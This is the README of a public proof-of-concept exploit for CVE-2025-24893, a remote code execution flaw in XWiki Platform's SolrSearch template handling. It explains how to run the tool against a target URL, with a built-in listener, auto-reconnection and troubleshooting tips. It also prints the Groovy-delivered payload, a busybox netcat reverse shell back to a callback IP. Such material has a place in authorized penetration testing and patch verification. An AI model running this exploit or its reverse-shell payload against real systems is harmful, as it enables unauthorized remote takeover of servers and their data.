# CVE-2025-24893 - XWiki Platform Remote Code Execution
A Python exploit for CVE-2025-24893, a remote code execution vulnerability in XWiki Platform. This exploit includes a self-contained reverse shell listener using pwntools.
## Description
This exploit targets XWiki Platform installations vulnerable to CVE-2025-24893, allowing remote code execution through a template injection vulnerability in the SolrSearch component. The exploit automatically starts a reverse shell listener and provides an interactive shell upon successful exploitation.
## Requirements
- Python 3.x
- `requests` library
- `pwntools` library
## Installation
### Recommended: Using UV (Modern Python Package Manager)
```bash
# Install UV if you don't have it
curl -LsSf https://astral.sh/uv/install.sh | sh
# Install dependencies
uv pip install requests pwntools
```
### Alternative: Using pip
```bash
pip install requests pwntools
```
## Usage
### Basic Usage
```bash
python3 CVE-2025-24893.py <target_url>
```
### Examples
```bash
# Basic usage with default callback (0.0.0.0:9521)
python3 CVE-2025-24893.py example.com
# Custom callback IP and port
python3 CVE-2025-24893.py example.com -i 192.168.1.100 -p 4444
# Skip initial test and go straight to reverse shell
python3 CVE-2025-24893.py example.com --no-test
# Custom reconnection attempts
python3 CVE-2025-24893.py example.com --max-reconnects 10
# Full custom configuration
python3 CVE-2025-24893.py example.com -i 10.0.0.5 -p 8080 --no-test --max-reconnects 3
```
### Command Line Arguments
- `target`: Target URL (required)
  - Can be domain only: `example.com`
  - Can include protocol: `http://example.com` or `https://example.com`
- `-i, --ip`: Callback IP for reverse shell (default: 0.0.0.0)
  - Use `0.0.0.0` to listen on all interfaces
  - Use a specific IP (e.g., `192.168.1.100`) to bind to a specific interface
- `-p, --port`: Callback port for reverse shell (default: 9521)
- `--no-test`: Skip the initial test and go straight to reverse shell
- `--max-reconnects`: Maximum reconnection attempts when shell drops (default: 5)
## How It Works
1. **Protocol Detection**: Automatically detects if the target supports HTTP or HTTPS
2. **Test Phase**: Runs a test command (`id`) to verify the exploit works
3. **Listener Setup**: Automatically starts a reverse shell listener using pwntools
4. **Payload Execution**: Sends the reverse shell payload to the target
5. **Interactive Shell**: Provides an interactive shell upon successful connection
6. **Auto-Reconnection**: Automatically re-establishes connection if shell drops
## Self-Contained Reverse Shell
This exploit is self-contained and does not require manual netcat setup:
- Automatically starts a listener on the specified IP and port
- Handles the reverse shell connection automatically
- Provides an interactive shell interface
- No need to manually run `nc -lvp <port>`
## Automatic Reconnection
The exploit includes robust reconnection capabilities:
- **EOF Handling**: Automatically detects when shell connection drops
- **Auto-Recovery**: Re-establishes listener and re-sends exploit payload
- **Configurable Retries**: Set maximum reconnection attempts (default: 5)
- **Graceful Degradation**: Continues until max attempts reached
### Reconnection Behavior
When the shell connection drops (EOF error):
1. Detects the connection loss
2. Closes the old listener
3. Starts a new listener
4. Re-sends the exploit payload
5. Re-establishes the shell connection
6. Continues interactive session
## Payload Details
The exploit uses a Groovy template injection payload that executes:
```bash
busybox nc <callback_ip> <callback_port> -e /bin/sh
```
## Features
- **Automatic Protocol Detection**: Detects HTTP/HTTPS automatically
- **Self-Contained Listener**: No manual netcat setup required
- **Interactive Shell**: Full interactive shell upon successful exploitation
- **Test Mode**: Optional test phase to verify exploit works
- **Flexible Configuration**: Customizable callback IP and port
- **Auto-Reconnection**: Handles connection drops automatically
- **Robust Error Handling**: Graceful handling of various error conditions
## Troubleshooting
### Common Issues
1. **"Address already in use"**: Change the port using the `-p` flag
2. **"Permission denied"**: Try using a port > 1024 or run with sudo
3. **No connection received**:
   - Verify the target is vulnerable
   - Check if the target can reach your callback IP
   - Ensure no firewall is blocking the connection
4. **"Got EOF while sending in interactive"**:
   - The script will automatically handle this and re-establish the connection
   - If persistent, check network stability or increase `--max-reconnects`
### Network Considerations
- The callback IP should be reachable from the target
- Use `0.0.0.0` to listen on all interfaces
- For external targets, ensure your IP is publicly accessible
- Unstable networks may require higher reconnection limits
## Disclaimer
This tool is for educational and authorized testing purposes only. Always ensure you have proper authorization before testing any systems.
## Credits
- **Author**: nopgadget
- **Based on**: Original script by Al Baradi Joy
## License
This project is for educational purposes only. Use responsibly and only on systems you own or have explicit permission to test.
## File snapshot
```
[4.0K] /data/pocs/4bc4f9df59accdc479e9c7fceb303aeaad7b5344
├── [9.0K] CVE-2025-24893.py
└── [5.2K] README.md
0 directories, 2 files
```